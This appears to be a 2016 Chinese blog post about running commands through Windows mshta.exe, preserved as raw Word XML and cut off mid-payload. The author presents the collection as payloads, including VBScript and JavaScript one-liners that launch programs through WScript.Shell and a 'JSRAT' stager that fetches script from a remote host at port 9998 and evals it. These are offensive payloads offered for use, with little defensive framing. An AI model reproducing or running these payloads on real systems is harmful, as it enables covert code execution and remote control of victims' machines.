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2AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="525" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="新細明體" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="新細明體" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="新細明體" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>命令用法示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="225"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>Exec Commands Via Mshta.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-meta-item-icon"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-meta-item-text"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>发表于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-time"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 2016-06-24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-meta-divider"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-category"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-meta-item-icon"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-meta-item-text"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>分类于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="post-category"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
            <w:color w:val="555555"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>奇技淫巧</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:pStyle w:val="Web"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://drops.wooyun.org/papers/17049" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>用“世界上最好的编程语言”制作的敲诈者木马揭秘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>的时候发现，攻击者使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来执行命令，之前没怎么接触过，查了查资料也不是很多，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>是用来执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>文件的，经过测试发现，其实没有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>文件，也可以通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来执行命令的，经过几次测试发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>不仅可以使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>vbscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>，而且可以使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>来执行命令，整理payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:pStyle w:val="Web"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>VBSCRIPT EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>复</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>制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196"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC4E1B" w:rsidTr="00CC4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E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1B"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:color w:val="999999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999999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E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D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mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> vbscript:CreateObject(</w:t>
            </w:r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>"Wscript.Shell"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).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Run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>"calc.exe"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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0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,true)(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>window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Style w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>close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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:pStyle w:val="Web"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>JAVASCRIPT EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>复</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>制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"/>
        <w:gridCol w:w="8258"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC4E1B" w:rsidTr="00CC4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E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1B"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:color w:val="999999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999999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E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D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mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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:</w:t>
            </w:r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>"\..\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>mshtml,RunHTMLApplication</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> "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;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>document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.write();h=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new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%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>20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ActiveXObject(</w:t>
            </w:r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>"WScript.Shell"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).run(</w:t>
            </w:r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>"calc.exe"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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="literal"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>true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);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>try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{h.Send();b=h.ResponseText;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>eval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(b);}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>catch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(e){</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>new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%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>20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ActiveXObject(</w:t>
            </w:r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>"WScript.Shell"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).Run(</w:t>
            </w:r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 xml:space="preserve">"cmd /c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>taskkill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> /f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>im</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> mshta.exe"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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="literal"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>true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);}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:pStyle w:val="Web"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>JSRAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00CC4E1B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>复</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>制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"/>
        <w:gridCol w:w="8268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC4E1B" w:rsidTr="00CC4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E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1B"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:color w:val="999999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999999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4E1B" w:rsidRDefault="00CC4E1B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D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mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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:</w:t>
            </w:r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>"\..\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>mshtml,RunHTMLApplication</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> "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;document.write();h=new%20ActiveXObject(</w:t>
            </w:r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>"WinHttp.WinHttpRequest.5.1"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);h.Open(</w:t>
            </w:r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>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r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>"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,</w:t>
            </w:r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>"http://192.168.2.101:9998/connect"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,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(</w:t>
            </w:r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>"WScript.Shell"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).Run(</w:t>
            </w:r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 xml:space="preserve">"cmd /c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>taskkill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> /f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>im</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="string"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> mshta.exe"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,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="line"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
